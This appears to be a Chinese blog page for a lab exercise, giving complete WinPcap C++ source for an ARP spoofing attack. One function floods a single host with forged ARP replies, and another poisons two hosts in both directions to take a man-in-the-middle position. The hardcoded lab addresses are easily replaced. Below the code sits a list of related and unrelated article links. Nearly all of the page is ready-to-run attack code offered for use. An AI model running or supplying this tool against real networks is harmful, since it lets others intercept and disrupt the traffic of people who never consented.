winpcap实现ARP欺骗攻击
使用winpcap实现ARP欺骗代码
实验过程见 winpcap实现ARP欺骗攻击实验过程
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define _CRT_SECURE_NO_WARNINGS
#define HAVE_REMOTE
#define WIN32
#include <iostream>
#include "pcap.h"
#pragma comment(lib,"wpcap")using namespace std;//对齐
#pragma pack (1)//MAC地址
struct mac_address {u_char byte[6];
};struct eth_head {mac_address destMAC; //目的MAC地址 6字节 mac_address sourceMAC; //源MAC地址 6字节 u_short type; //帧类型, 0x0806是ARP帧的类型值
};struct arp_head
{unsigned short hardwareType; //硬件类型unsigned short protocolType; //协议类型unsigned char hardwareAddLen; //硬件地址长度unsigned char protocolAddLen; //协议地址长度unsigned short op; //op,操作类型mac_address sourceMAC; //发送方MAC地址unsigned long sourceIP; //发送方IP地址mac_address destMAC; //目的MAC地址unsigned long destIP; //目的IP地址
};struct arp_packet
{eth_head apt_eth_head;arp_head apt_arp_head;
};#pragma pack ()//单向欺骗
int mod1(pcap_t* adhandle)
{//伪造ARP Relpy包//目标信息string DstIP = "192.168.243.80";u_char DstMAC[6] = { 0x00,0x0C,0x29,0xB0,0xD7,0x94 };//源信息string SrcIP = "192.168.243.33";u_char SrcMAC[6] = { 0x7C,0xB2,0x7D,0xD4,0xE9,0xDC }; //假MAC地址(攻击机MAC)eth_head eh; //以太网头arp_head ah; //ARP头for (int i = 0; i < 6; i++)eh.destMAC.byte[i] = DstMAC[i];for (int i = 0; i < 6; i++)eh.sourceMAC.byte[i] = SrcMAC[i];eh.type = htons(0x0806); //ARP类型ah.hardwareType = htons(0x0001);ah.protocolType = htons(0x0800);ah.hardwareAddLen = 0x06;ah.protocolAddLen = 0x04;ah.op = htons(0x0002);ah.sourceMAC = eh.sourceMAC;ah.sourceIP = inet_addr(SrcIP.c_str());ah.destMAC = eh.destMAC;ah.destIP = inet_addr(DstIP.c_str());arp_packet* apt = NULL;unsigned char sendbuffer[80];memset(sendbuffer, 0, sizeof(sendbuffer));apt = (arp_packet*)sendbuffer;apt->apt_eth_head = eh;apt->apt_arp_head = ah;while (true){if (pcap_sendpacket(adhandle, sendbuffer, sizeof(sendbuffer)) != 0){cout << "packets send ERROR!" << endl;return -1;}cout << "SEND SUCCESS" << endl;Sleep(100);}return 0;
}//双向欺骗
int mod2(pcap_t* adhandle)
{//主机Astring A_IP = "192.168.243.80";u_char A_MAC[6] = { 0x00,0x0C,0x29,0xB0,0xD7,0x94 };//主机Bstring B_IP = "192.168.243.53";u_char B_MAC[6] = { 0x00,0x0C,0x29,0x64,0x03,0x99 };//攻击机Cstring C_IP = "";u_char C_MAC[6] = { 0x7C,0xB2,0x7D,0xD4,0xE9,0xDC };//发送给A的包eth_head eh_A; //以太网头arp_head ah_A; //ARP头for (int i = 0; i < 6; i++)eh_A.destMAC.byte[i] = A_MAC[i];for (int i = 0; i < 6; i++)eh_A.sourceMAC.byte[i] = C_MAC[i];eh_A.type = htons(0x0806); //ARP类型ah_A.hardwareType = htons(0x0001);ah_A.protocolType = htons(0x0800);ah_A.hardwareAddLen = 0x06;ah_A.protocolAddLen = 0x04;ah_A.op = htons(0x0002);ah_A.sourceMAC = eh_A.sourceMAC;ah_A.sourceIP = inet_addr(B_IP.c_str());ah_A.destMAC = eh_A.destMAC;ah_A.destIP = inet_addr(A_IP.c_str());//发送给B的包eth_head eh_B; //以太网头arp_head ah_B; //ARP头for (int i = 0; i < 6; i++)eh_B.destMAC.byte[i] = B_MAC[i];for (int i = 0; i < 6; i++)eh_B.sourceMAC.byte[i] = C_MAC[i];eh_B.type = htons(0x0806); //ARP类型ah_B.hardwareType = htons(0x0001);ah_B.protocolType = htons(0x0800);ah_B.hardwareAddLen = 0x06;ah_B.protocolAddLen = 0x04;ah_B.op = htons(0x0002);ah_B.sourceMAC = eh_B.sourceMAC;ah_B.sourceIP = inet_addr(A_IP.c_str());ah_B.destMAC = eh_B.destMAC;ah_B.destIP = inet_addr(B_IP.c_str());arp_packet* apt_A = NULL;unsigned char sendbuffer_A[80];memset(sendbuffer_A, 0, sizeof(sendbuffer_A));apt_A = (arp_packet*)sendbuffer_A;apt_A->apt_eth_head = eh_A;apt_A->apt_arp_head = ah_A;arp_packet* apt_B = NULL;unsigned char sendbuffer_B[80];memset(sendbuffer_B, 0, sizeof(sendbuffer_B));apt_B = (arp_packet*)sendbuffer_B;apt_B->apt_eth_head = eh_B;apt_B->apt_arp_head = ah_B;while (true){if (pcap_sendpacket(adhandle, sendbuffer_A, sizeof(sendbuffer_A)) != 0){cout << "packets send ERROR! A" << endl;return -1;}if (pcap_sendpacket(adhandle, sendbuffer_B, sizeof(sendbuffer_B)) != 0){cout << "packets send ERROR! B" << endl;return -1;}cout << "SEND SUCCESS" << endl;Sleep(100);}return 0;
}int main()
{pcap_if_t* alldevs;pcap_if_t* d;char errbuf[PCAP_ERRBUF_SIZE];//获取设备列表if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1){cout << "Error in pacp_findalldevs_ex:" << errbuf << endl;return -1;}int i = 0;for (d = alldevs; d != NULL; d = d->next){cout << endl;cout << i++ << " " << d->name << endl;if (d->description)cout << " <" << d->description << ">" << endl;elsecout << " <No description>" << endl;}if (i == 0){cout << "No interfaces found!" << endl;return -1;}while (true){int n;cout << "\nchose interface:";cin >> n;if (n == -1){pcap_freealldevs(alldevs);return 0;}if (n < 0 || n >= i)continue;for (d = alldevs, i = 0; i < n; d = d->next, i++);cout << n << " " << d->name << endl;if (d->description)cout << " <" << d->description << ">" << endl;elsecout << " <No description>" << endl;break;}//打开与网络适配器绑定的设备pcap_t* adhandle;if ((adhandle = pcap_open(d->name, 65535, PCAP_OPENFLAG_PROMISCUOUS, 1000, NULL, errbuf)) == NULL){cout << "ERROR in open" << endl;pcap_freealldevs(alldevs);return -1;}pcap_freealldevs(alldevs);//单向还是双向欺骗//mod1(adhandle);mod2(adhandle);return 0;
}
winpcap实现ARP欺骗攻击相关推荐
- 网络安全实验之《ARP欺骗攻击》实验报告
一.实验目的 (1)课上实验(ARP欺骗攻击工具实验):运行WinArpAttacker或Ettercap(二选一),通过WireShark等抓包工具,捕获ARP欺骗攻击的数据包,分析ARP攻击的原理 ...
- ARP欺骗攻击的检测和防御
以太网构建由 1500 个字节的块组成的数据帧.每个以太网数据帧头包括源 MAC 地址和 目的 MAC 地址.建造以太网数据帧,必须从 IP 数据包中开始.但在构建过程中,以太网并 不知道目标机器的M ...
- 模拟ARP欺骗攻击与防护
为保证网络环境的安全,模拟ARP欺骗在eNSP模拟器+VMware虚拟机上构建网络环境. 一:ARP欺骗攻击 1.准备环境:华为eNSP模拟器+VMware虚拟机上创建kali服务器 2.在虚拟机上打 ...
- 如何发动一次ARP欺骗攻击
免责协议:本文整个实验过程都在虚拟机中进行,且本材料仅供交流学习使用,严禁用于违法犯罪. 1.环境部署:服务器 windows2008 客户机 windows10 攻击机 kali 都在同一网络环 ...
- ARP欺骗攻击原理及其防御
一.概述 1.ARP协议 地址解析协议,将IP地址转换为对应的mac地址,属链路层协议 数据包分为: 请求包(广播):本机IP地址.mac地址+目标主机IP地址 应答包(单播):本机IP地址.mac地 ...
- H3C防止同网段arp欺骗攻击配置
防止同网段ARP欺骗攻击的配置方法 二层交换机实现仿冒网关的ARP防攻击:一.组网需求:1. 二层交换机阻止网络用户仿冒网关IP的ARP攻击二.组网图: 图1二层交换机防ARP攻击组网S3552P是三 ...
- 3-wireshark网络安全分析——ARP欺骗攻击
目录 1. 中间人攻击 2. ARP欺骗 3. ARP欺骗过程分析 4. Wireshark专家系统分析 5. 如何防御ARP欺骗 ARP协议可参考:https://blog.csdn.net/qq_ ...
- 从菜鸟到高手,CMD命令行了解arp欺骗攻击的原理
arp的中文释义是地址解析协议,全英文 address resolution protocol,是一个将局域网IP地址映射到网卡物理地址(MAC)的工作协议.或许你应该听说过或者遇到过arp欺骗攻击, ...
- 防火墙 | ARP欺骗攻击
防火墙 | ARP欺骗攻击 每天一个入狱小技巧!!! ARP欺骗攻击利用的原理 主机接收到一个应答包之后,并不会验证自己是否发送过对应的arp请求包,也不会验证这个arp请求包是否可信,而是直接用应答 ...
最新文章
- MySQL数据库(十) 一一 数据库的导出和导入
- 年月日_C++计算输入的年月日是这一年的第几天
- Hive安装MySql
- python里边的单词都表示什么_Python:只保留字符串中的单词,每个单词都在newlin上...
- java session 生命周期_java之hibernate之session中对象的生命周期
- HAProxy + Keepalived实现MySQL的高可用负载均衡
- [线筛五连]线筛欧拉函数
- Flutter IM 极光
- Java 查询Word是否存在关键字,并保留word路径到txt
- Apache Tomcat漏洞总结
- 字节跳动笔试题-前端(互娱)
- ahk写入excel单元格_输出excel数据到GUI 获取excel所有Sheet及字段 Autohotkey
- 流放之路进去后显示无法连接登入服务器,流放之路此账号目前无法登录游戏
- 实记JLink-V8刷固件方法
- 《IOS疯狂讲义》雪花飘飘效果实现
- 2020人工智能教育创新排行榜
- SSIST 2016 参会总结--day2
- python SQLite数据库基本操作
- 编程英语:常见代码错误 error 语句学习(15)
- 小波从此逝,江海寄余生,不但是文坛巨擘还是不世出的编程奇才,王小波离世25周年
热门文章
- 单点登录和第三方登录
- ISME | 拟南芥次生代谢物调控微生物组介导的线虫入侵
- 818专业课【考经】—《信号系统》之章节概要:第七章 傅里叶变换的应用
- 迁移pg之后org.postgresql.util.PSQLException: ERROR: could not find left sibling of block 4594 in index..
- 【Go语言刷题篇】Go完结篇|函数、结构体、接口、错误入门学习
- 前端和数据库学习的链接
- STM32F103 通过SD卡IAP升级程序,带MD5校验,(带源码)可在实际项目中使用
- Stardock Start11 v1.36 Windows开始菜单增强工具直装版
- php 禁止模拟手机,php防止模拟请求 - bengozhong的个人空间 - OSCHINA - 中文开源技术交流社区...
- Python基础——类与对象